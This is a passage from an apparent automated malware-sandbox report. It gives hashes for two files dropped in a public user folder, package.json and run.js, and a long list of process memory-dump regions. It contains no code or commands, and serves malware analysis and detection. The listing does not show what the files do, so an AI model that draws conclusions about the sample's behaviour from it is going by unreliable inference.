
                    3a6537ac98b7cdb20f6ea4f86a76704e

                    SHA1

                    ff696860120a820dd728de2f33cb0d2b3d3abab5

                    SHA256

                    340c15e404619ed7d2c158c8956c1c44dfa2649fbb33c72e043bd538d35b153c

                    SHA512

                    e75ee3e67f37fe614b6636db3e32f335c8196a98de923ba5a516fb5eb36b7421756dfa888d4d1949a32debd5d9f331159f69d51ec796f7fa48e4a8ae4e8ce3db

                  • C:\Users\Public\package.json

                    Filesize

                    80B

                    MD5

                    561b0767d774c4ee83cff11195bf0f78

                    SHA1

                    f2106c79a585a699a70bd7bdf8e49425d0230fd7

                    SHA256

                    10a2973b3545db3ea55c71f241676db0825c1cdecd1ef070a0c71b56b48f33ca

                    SHA512

                    7e99c9f6ae3bcfe2f8c730dd7274bd7cfca87a76625af6be72a60b09fe48261b3240b051bad4c3c0bdc5781c3ecd730766cd83ef936ee4d5d08aec911e181dd2

                  • C:\Users\Public\run.js

                    Filesize

                    1KB

                    MD5

                    166e57b73fd399b0f54c415d22b235f6

                    SHA1

                    f20bf715826dc97a5e26c7acc4310d32213cc2b7

                    SHA256

                    f7741744738c58c8cd5b1b8bc756860a68a8b3378576c421f0f597edf29f5df3

                    SHA512

                    e2a32241f607f0b6842ca2546002ad086035161249bd2dd3bf04a05dcbf6ad660ef91d23507c0f0c983769ade7d73d0b627b8c16c31954e607b4261b89979eda

                  • memory/592-3129-0x00000179E8E20000-0x00000179E8E30000-memory.dmp

                    Filesize

                    64KB

                  • memory/592-3128-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/592-3218-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/760-3118-0x0000017CCBBA0000-0x0000017CCBBB0000-memory.dmp

                    Filesize

                    64KB

                  • memory/760-3116-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/760-3139-0x0000017CEE7E0000-0x0000017CEE8EE000-memory.dmp

                    Filesize

                    1.1MB

                  • memory/760-3117-0x0000017CCBBA0000-0x0000017CCBBB0000-memory.dmp

                    Filesize

                    64KB

                  • memory/760-3221-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1440-3023-0x000002DBAB0B0000-0x000002DBAB0D6000-memory.dmp

                    Filesize

                    152KB

                  • memory/1440-3012-0x000002DBAA580000-0x000002DBAA590000-memory.dmp

                    Filesize

                    64KB

                  • memory/1440-3011-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1440-3024-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1452-3314-0x00007FF8AE070000-0x00007FF8AEB31000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1452-3309-0x0000028F7EB90000-0x0000028F7EBA0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1452-3298-0x0000028F7EB90000-0x0000028F7EBA0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1452-3297-0x00007FF8AE070000-0x00007FF8AEB31000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1452-3308-0x0000028F7EB90000-0x0000028F7EBA0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1616-3036-0x000001C1DFEE0000-0x000001C1DFEF0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1616-3038-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1616-3025-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1616-3032-0x000001C1DFEE0000-0x000001C1DFEF0000-memory.dmp

                    Filesize

                    64KB

                  • memory/2308-3295-0x000001D72DB80000-0x000001D72DB81000-memory.dmp

                    Filesize

                    4KB

                  • memory/2308-3293-0x000001D72DA70000-0x000001D72DA71000-memory.dmp

                    Filesize

                    4KB

                  • memory/2308-3291-0x000001D72DA40000-0x000001D72DA41000-memory.dmp

                    Filesize

                    4KB

                  • memory/2308-3275-0x000001D725740000-0x000001D725750000-memory.dmp

                    Filesize

                    64KB

                  • memory/2308-3294-0x000001D72DA70000-0x000001D72DA71000-memory.dmp

                    Filesize

                    4KB

                  • memory/2320-3315-0x0000000074A00000-0x00000000751B0000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/2320-3311-0x0000000074A00000-0x00000000751B0000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/2388-17-0x0000015D51370000-0x0000015D51382000-memory.dmp

                    Filesize

                    72KB

                  • memory/2388-10-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2388-16-0x0000015D50880000-0x0000015D50890000-memory.dmp

                    Filesize

                    64KB

                  • memory/2388-15-0x0000015D50880000-0x0000015D50890000-memory.dmp

                    Filesize

                    64KB

                  • memory/2388-14-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2388-5-0x0000015D511B0000-0x0000015D511D2000-memory.dmp

                    Filesize

                    136KB

                  • memory/2388-13-0x0000015D51310000-0x0000015D51324000-memory.dmp

                    Filesize

                    80KB

                  • memory/2388-18-0x0000015D50870000-0x0000015D5087A000-memory.dmp

                    Filesize

                    40KB

                  • memory/2388-12-0x0000015D512E0000-0x0000015D51306000-memory.dmp

                    Filesize

                    152KB

                  • memory/2388-11-0x0000015D50880000-0x0000015D50890000-memory.dmp

                    Filesize

                    64KB

                  • memory/2388-3007-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2572-3230-0x0000000005720000-0x00000000057BC000-memory.dmp

                    Filesize

                    624KB

                  • memory/2572-3232-0x0000000005950000-0x00000000059E2000-memory.dmp

                    Filesize

                    584KB

                  • memory/2572-3236-0x0000000006990000-0x00000000069A8000-memory.dmp

                    Filesize

                    96KB

                  • memory/2572-3237-0x0000000074A00000-0x00000000751B0000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/2572-3238-0x0000000005850000-0x0000000005860000-memory.dmp

                    Filesize

                    64KB

                  • memory/2572-3235-0x0000000005BC0000-0x0000000005C26000-memory.dmp

                    Filesize

                    408KB

                  • memory/2572-3226-0x0000000000400000-0x0000000000416000-memory.dmp

                    Filesize

                    88KB

                  • memory/2572-3229-0x0000000074A00000-0x00000000751B0000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/2572-3234-0x0000000005930000-0x000000000593A000-memory.dmp

                    Filesize

                    40KB

                  • memory/2572-3231-0x0000000005D70000-0x0000000006314000-memory.dmp

                    Filesize

                    5.6MB

                  • memory/2572-3233-0x0000000005850000-0x0000000005860000-memory.dmp

                    Filesize

                    64KB

                  • memory/3556-3240-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3556-3256-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3556-3251-0x0000015B36610000-0x0000015B36620000-memory.dmp

                    Filesize

                    64KB

                  • memory/3556-3241-0x0000015B36610000-0x0000015B36620000-memory.dmp

                    Filesize

                    64KB

                  • memory/4092-3331-0x0000000074A00000-0x00000000751B0000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/4092-3335-0x0000000074A00000-0x00000000751B0000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/4408-3253-0x0000000074A00000-0x00000000751B0000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/4408-3258-0x0000000074A00000-0x00000000751B0000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/4984-3318-0x00007FF8AE9D0000-0x00007FF8AF491000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4984-3328-0x000001E1FFD10000-0x000001E1FFD20000-memory.dmp

                    Filesize

                    64KB

                  • memory/4984-3329-0x000001E1FFD10000-0x000001E1FFD20000-memory.dmp

                    Filesize

                    64KB

                  • memory/4984-3334-0x00007FF8AE9D0000-0x00007FF8AF491000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/5008-3048-0x000001BCDB240000-0x000001BCDB250000-memory.dmp

                    Filesize

                    64KB

                  • memory/5008-3228-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/5008-3046-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/5008-3047-0x000001BCDB240000-0x000001BCDB250000-memory.dmp

                    Filesize

                    64KB

                  • memory/5008-3225-0x000001BCDB240000-0x000001BCDB250000-memory.dmp

                    Filesize

                    64KB

                  • memory/5008-3224-0x000001BCDBD40000-0x000001BCDBD92000-memory.dmp

                    Filesize

                    328KB